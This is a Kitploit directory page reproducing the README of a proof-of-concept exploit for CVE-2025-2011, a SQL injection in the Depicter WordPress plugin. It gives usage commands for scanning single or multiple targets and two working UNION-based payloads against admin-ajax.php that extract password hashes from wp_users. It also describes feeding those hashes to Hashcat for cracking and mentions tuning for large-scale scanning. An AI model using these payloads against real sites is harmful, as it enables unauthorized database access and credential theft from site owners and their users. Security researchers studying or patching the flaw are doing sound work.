Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-2011 — Exploit for CVE-2025-2011 | Kitploit
Tools/GitHubGitHub/x3rx3ssec/cve-2025-2011
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Exploit for CVE-2025-2011

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-2011 PoC

By: X3RX3S But Proudly ripped by Ash Wesker that GPT'd my code with his banner ;) see here ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 You can even see my handle in 'his' code -_-'

Purpose: A proof-of-concept tool to test for an SQL injection vulnerability (CVE-2025-2011) against WordPress sites.
Disclaimer: Use only on systems you own or have explicit written permission to test. Unauthorized testing is illegal and unethical. Screenshot From 2025-11-02 19-44-16


About the vulnerability :)

  • The Slider & Popup Builder by Depicter plugin for WordPress is vulnerable to generic SQL Injection via the ‘s' parameter in all versions up to, and including, 3.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Features

  • Two SQLi payloads (selectable with -p 1 or -p 2)
  • Bcrypt ($2a$, $2b$, $2y$) hash detection, including $wp$-prefixed variants
  • Results saved per hostname: results_<hostname>.txt
  • Optional Hashcat integration for bcrypt (-m 3200) with a prompt
  • Supports single URL (-u) or multiple targets via file (-f)

Requirements

  • Python 3.8+
  • pip packages:
    • requests
    • colorama

Install dependencies:

root@kitploit:~
pip install requests colorama

Optional (for cracking):

  • hashcat installed and available in your PATH (Default is /usr/share/wordlists/rockyou.txt)
  • A wordlist such as /usr/share/wordlists/rockyou.txt

Usage

Make the script executable (optional):

root@kitploit:~
chmod +x CVE-2025-2011.py

Single target (default payload 1):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Single target (payload 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Multiple targets from file (one URL per line):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Output

For each tested host the script saves a result file:

root@kitploit:~
results_<hostname>.txt

If bcrypt hashes are found, they are saved to hashes.txt and you will be prompted to crack them with Hashcat. Example Hashcat command used by the script:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Note: bcrypt is slow by design. Cracking may take a very long time and require GPUs.


Payloads

  • Payload 1 (default):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Payload 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Legal & Responsible Use

This tool is provided for educational and defensive purposes only. Do not use it against systems where you do not have explicit permission. The author and distributor accept no responsibility for misuse. Always obtain written authorization before running tests against targets you do not own.


Notes & Tuning

  • If you have different wordlists, update the run_hashcat function in the script to point to your preferred list.
  • If Hashcat is not installed or you prefer not to crack hashes, answer N when prompted.
  • You can adjust timeouts and thread behavior in the script for large-scale scanning.

Scrambled togheter by

  • X3RX3S
  • Inspired by responsible security research workflows & Chocapikk (https://github.com/Chocapikk.
Download Tool